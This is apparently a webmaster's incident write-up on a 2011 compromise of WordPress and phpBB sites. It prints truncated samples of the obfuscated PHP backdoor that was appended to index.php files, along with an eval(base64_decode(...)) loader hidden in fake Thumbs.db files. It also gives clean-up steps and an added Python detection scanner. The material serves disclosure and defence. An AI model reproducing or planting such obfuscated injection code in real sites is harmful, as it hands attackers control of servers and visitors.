Servers with forums and WordPress installs compromised by hackers

In November 2011 I came across a server that had been compromised by hackers. In short, the index.php files had been edited and a long line appended to the end of each, containing the following (I trimmed some of the long strings of characters so as not to post the code in full):

if (!isset($eva1fYlbakBcVSir)) {
$eva1fYlbakBcVSir = "7kyJ7kSKioDTWVWeRB3TiciL1UjcmRiLn4SKiAETs90cuZlTz5mROtHWHdWfRt0ZupmVRNTU2Y2MVZkT8h1Rn1XULdmbqxGU7h1Rn1XULdmbqZVUzElNmNTVGxEeNt1ZzkFcmJyJuUTNyZGJuciLxk2cwRCLiICKuVHdlJHJn4SNykmckRiLnsTKn4iInIiLnAkdX5Uc2dlTshEcMhHT8xFeMx2T4xjWkNTUwVGNdVzWvV1Wc9WT2wlbqZVX3lEclhTTKdWf8oEZzkVNdp2NwZGNVtVX8dmRPF3N1U2cVZDX4lVcdlWWKd2aZBnZtVFfNJ3N1U2cVZDX4lVcdl...";
$eva1tYldakBcVSir = "x73164x72162x65...";
$eva1tYldakBoVS1r = "x65143x61154x70...";
$eva1tYidokBoVSjr = "x3b51x29135x31...";
$eva1tYldokBcVSjr=$eva1tYldakBcVSir($eva1tYldakBoVS1r);
$eva1tYldakBcVSjr=$eva1tYldakBcVSir($eva1tYlbakBcVSir);
$eva1tYidakBcVSjr = $eva1tYldakBcVSjr(chr(2687.5*0.016), $eva1fYlbakBcVSir);
$eva1tYXdakAcVSjr = $eva1tYidakBcVSjr[0.031*0.061];
$eva1tYidokBcVSjr = $eva1tYldakBcVSjr(chr(3625*0.016), $eva1tYidokBoVSjr);
$eva1tYldokBcVSjr($eva1tYidokBcVSjr[0.016*(7812.5*0.016)],$eva1tYidokBcVSjr[62.5*0.016],$eva1tYldakBcVSir($eva1tYidokBcVSjr[0.061*0.031]));
$eva1tYldakBcVSir = "";
$eva1tYldakBoVS1r = $eva1tYlbakBcVSir.$eva1tYlbakBcVSir;
$eva1tYidokBoVSjr = $eva1tYlbakBcVSir;
$eva1tYldakBcVSir = "x73164x72x65143x72160164x72";
$eva1tYlbakBcVSir = "x67141x6f133x70170x65";
$eva1tYldakBoVS1r = "x65143x72160";
$eva1tYldakBcVSir = "";
$eva1tYldakBoVS1r = $eva1tYlbakBcVSir.$eva1tYlbakBcVSir;
$eva1tYidokBoVSjr = $eva1tYlbakBcVSir;
}

The code above works only in conjunction with another file, named Thumbs.db, located in the same directory. Example of the code from this file:

eval(base64_decode("aWYgKCRldmFsSnlDZUxxSXN0WG9wdWggIT0gNjQ4NzIpIHtmdW5jdGlvbiBldmFsV3FmR0RMSk...

What I did in this situation

1. I restored the files from the hosting server's backup. However, I still found problems after that! Strange! On a WordPress blog I got the error below, but it was caused by step no. 2:

Warning: Unknown: failed to open stream: No such file or directory in Unknown on line 0
Fatal error: Unknown: Failed opening required '/homeabc/def/ghi/Thumbs.db' (include_path='.:/usr/lib/php:/usr/local/lib/php') in Unknown on line 0

2. I deleted all Thumbs.db files from the hosting account.

About this type of compromise

The hacker modifies every file named index.php that he finds on the server, appending a line at the bottom. Next to each modified file he copies a Thumbs.db file, which also contains PHP code. When the PHP file is accessed, the inserted code is decoded and executed.
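A detection pass for the two artifacts described above (the appended `$eva1...` line at the end of index.php, and PHP code hidden inside a file named Thumbs.db), which also supports the clean-up steps listed earlier. This is an added example written for this page, not code from the original post; the directory tree it scans is constructed inline, and the patterns are assumptions drawn from the snippets shown here.

```python
import os
import re
import tempfile
from pathlib import Path

# Assumed indicators, taken from the snippets on this page: every injected
# variable starts with "$eva1", and Thumbs.db carries eval(base64_decode(...)).
INJECTED_VAR = re.compile(r"\$eva1[A-Za-z0-9]+")
EVAL_B64 = re.compile(r"eval\s*\(\s*base64_decode\s*\(")

def check_file(path: Path) -> list[str]:
    """Return the reasons a file looks like part of this infection (empty if clean)."""
    reasons = []
    try:
        text = path.read_text(errors="replace")
    except OSError:
        return reasons
    if path.name == "Thumbs.db":
        # A genuine Windows thumbnail cache is a binary OLE file, never PHP source.
        if "<?php" in text or EVAL_B64.search(text):
            reasons.append("Thumbs.db contains PHP code")
    if path.name == "index.php":
        # The infection appends one long line at the very end of index.php.
        last_line = text.rstrip().rsplit("\n", 1)[-1]
        if INJECTED_VAR.search(last_line) or EVAL_B64.search(last_line):
            reasons.append("index.php ends with injected obfuscated line")
    return reasons

def scan(root: str) -> dict[str, list[str]]:
    """Walk a web root and map each flagged file (relative path) to its reasons."""
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            p = Path(dirpath) / name
            reasons = check_file(p)
            if reasons:
                findings[str(p.relative_to(root))] = reasons
    return findings

def make_sample_tree() -> str:
    """Constructed sample web root: one clean site and one infected forum."""
    root = tempfile.mkdtemp()
    clean = Path(root, "site1"); clean.mkdir()
    (clean / "index.php").write_text("<?php\necho 'hello';\n")
    infected = Path(root, "site2", "forum"); infected.mkdir(parents=True)
    (infected / "index.php").write_text(
        "<?php\necho 'forum';\n"
        '<?php if (!isset($eva1fYlbakBcVSir)) { $eva1fYlbakBcVSir = "7kyJ7kSK..."; } ?>\n')
    (infected / "Thumbs.db").write_text('<?php eval(base64_decode("aWYgKC...")); ?>')
    return root
```

Running `scan()` over a real hosting account lists the files to restore from backup and the Thumbs.db files to remove, without touching anything itself.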

Where the server can be entered from (backdoors)

The hosting account contained websites, WordPress installs and phpBB forums. From the error logs I extracted the following text, so I assume the entry point was phpBB 3.0.8.

[03-Nov-2011 23:28:30] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/abc/public_html/sitex/forum/includes/hooks/index.php(250) : regexp code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code:1) in /home/abc/public_html/sitex/forum/includes/functions.php on line 2641

Other articles about this type of compromise:
http://wordpress.org/support/topic/websites-under-attack
I will come back with more details soon.
